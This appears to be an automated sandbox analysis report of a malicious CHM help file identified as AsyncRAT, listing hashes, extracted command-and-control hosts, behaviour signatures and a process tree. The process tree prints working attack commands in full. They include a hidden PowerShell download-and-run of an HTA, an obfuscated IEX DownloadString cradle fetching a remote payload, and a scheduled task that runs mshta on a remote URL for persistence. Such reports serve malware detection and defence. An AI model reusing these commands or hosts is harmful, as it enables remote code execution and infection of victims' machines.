Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 10:42

General

  • Target

    RG.chm

  • Size

    190KB

  • MD5

    9d9a0a119044c6a83d533a1941bb64c5

  • SHA1

    279387ccf49c5f71c99f8b89b333be4a70f6cab6

  • SHA256

    83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06

  • SHA512

    31c4edbcff416df4cada81dbd1e3bdc752cb8a74c837787feba01d9e93e00970b15efac6bf70548b8ba1811cf7e7522bbd64cfe0572d5619759b8069b5b399b2

  • SSDEEP

    3072:Xg4C8YLEo5xuIvDocDWjc/pgDXQgKpacezvRBDobwrArHMp1G6/AirUIKX6MA:XpYIW0UY8pTxp/mjmqArYRQIKX5A

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

- By Dimas Rodrigues

Botnet

2023

C2

clsuplementos.ddns.net:1110

clsuplementos.ddns.net:2220

clsuplementos.ddns.net:3330

clsuplementos.ddns.net:4440

clsuplementos.ddns.net:5550

clsuplementos.ddns.net:6660

clsuplementos.ddns.net:7770

clsuplementos.ddns.net:8880

clsuplementos.ddns.net:9990

handling.ddns.net:1110

handling.ddns.net:2220

handling.ddns.net:3330

handling.ddns.net:4440

handling.ddns.net:5550

handling.ddns.net:6660

handling.ddns.net:7770

handling.ddns.net:8880

handling.ddns.net:9990

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RG.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden wget 'https://meubooking.com.br/2023/reservations.php?file=edce4301c8d01cf9b904be.html' -OutFile 'C:\Users\Public\win32.hta'; Start-Process 'C:\Users\Public\win32.hta'
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1380
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\win32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command <#-------------#>$Ojbd='<#-------------#>IEX(N`e`w-Object Net.W';<#-------------#>$t2='ebClient).Downlo';<#-------------#>$t3='t4(''https://corpolevesuplementos.com.br/2022pws/assyncpws.jpg'')'.Replace('t4','adString');Sleep(5);IEX(<#-------------#>$Ojbd+<#-------------#>$t2+<#-------------#>$t3)
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3284
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
              PID:496
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /min schtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1828
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F
              5⤵
              • Creates scheduled task(s)
              PID:1284

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      70595b5937369a2592a524db67e208d3

      SHA1

      d989b934d9388104189f365694e794835aa6f52f

      SHA256

      be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

      SHA512

      edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2womcax.g2e.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\win32.hta
      Filesize

      254KB

      MD5

      9d447d72b85eca4c58a5b14dbb170e01

      SHA1

      9c39245d5b40e4815d006ce6fe402e7ec26e0045

      SHA256

      388e1f36d35dcbe4675821f4104514f66bcefdee33752acad874e45bdf44499a

      SHA512

      c7d9a77a78f1ee3dec93d288bbcd774f4667778970012cdbd4b0b0835ca29dc8717d9c90c07c79847e13483eb1057e039dae13777a33d1f157baa1d5e227c5f2

    • memory/496-188-0x00000000056C0000-0x00000000056D0000-memory.dmp
      Filesize

      64KB

    • memory/496-185-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

    • memory/496-190-0x00000000056C0000-0x00000000056D0000-memory.dmp
      Filesize

      64KB

    • memory/1380-151-0x0000014DAFE40000-0x0000014DAFE50000-memory.dmp
      Filesize

      64KB

    • memory/1380-152-0x0000014DAFE40000-0x0000014DAFE50000-memory.dmp
      Filesize

      64KB

    • memory/1380-153-0x0000014DAFE40000-0x0000014DAFE50000-memory.dmp
      Filesize

      64KB

    • memory/1380-146-0x0000014DAFE10000-0x0000014DAFE32000-memory.dmp
      Filesize

      136KB

    • memory/3188-196-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-193-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-198-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-199-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-195-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-177-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-194-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-197-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-192-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-191-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-200-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-183-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-189-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3188-201-0x00000237DABC0000-0x00000237DB077000-memory.dmp
      Filesize

      4.7MB

    • memory/3284-162-0x0000000005460000-0x0000000005470000-memory.dmp
      Filesize

      64KB

    • memory/3284-184-0x000000000E440000-0x000000000E4DC000-memory.dmp
      Filesize

      624KB

    • memory/3284-182-0x0000000005460000-0x0000000005470000-memory.dmp
      Filesize

      64KB

    • memory/3284-181-0x0000000005460000-0x0000000005470000-memory.dmp
      Filesize

      64KB

    • memory/3284-180-0x0000000005460000-0x0000000005470000-memory.dmp
      Filesize

      64KB

    • memory/3284-179-0x0000000006B90000-0x0000000006BAA000-memory.dmp
      Filesize

      104KB

    • memory/3284-178-0x0000000007CE0000-0x000000000835A000-memory.dmp
      Filesize

      6.5MB

    • memory/3284-176-0x0000000006660000-0x000000000667E000-memory.dmp
      Filesize

      120KB

    • memory/3284-165-0x00000000059E0000-0x0000000005A46000-memory.dmp
      Filesize

      408KB

    • memory/3284-164-0x0000000005970000-0x00000000059D6000-memory.dmp
      Filesize

      408KB

    • memory/3284-163-0x00000000056D0000-0x00000000056F2000-memory.dmp
      Filesize

      136KB

    • memory/3284-161-0x0000000005460000-0x0000000005470000-memory.dmp
      Filesize

      64KB

    • memory/3284-160-0x0000000005AA0000-0x00000000060C8000-memory.dmp
      Filesize

      6.2MB

    • memory/3284-159-0x0000000002D40000-0x0000000002D76000-memory.dmp
      Filesize

      216KB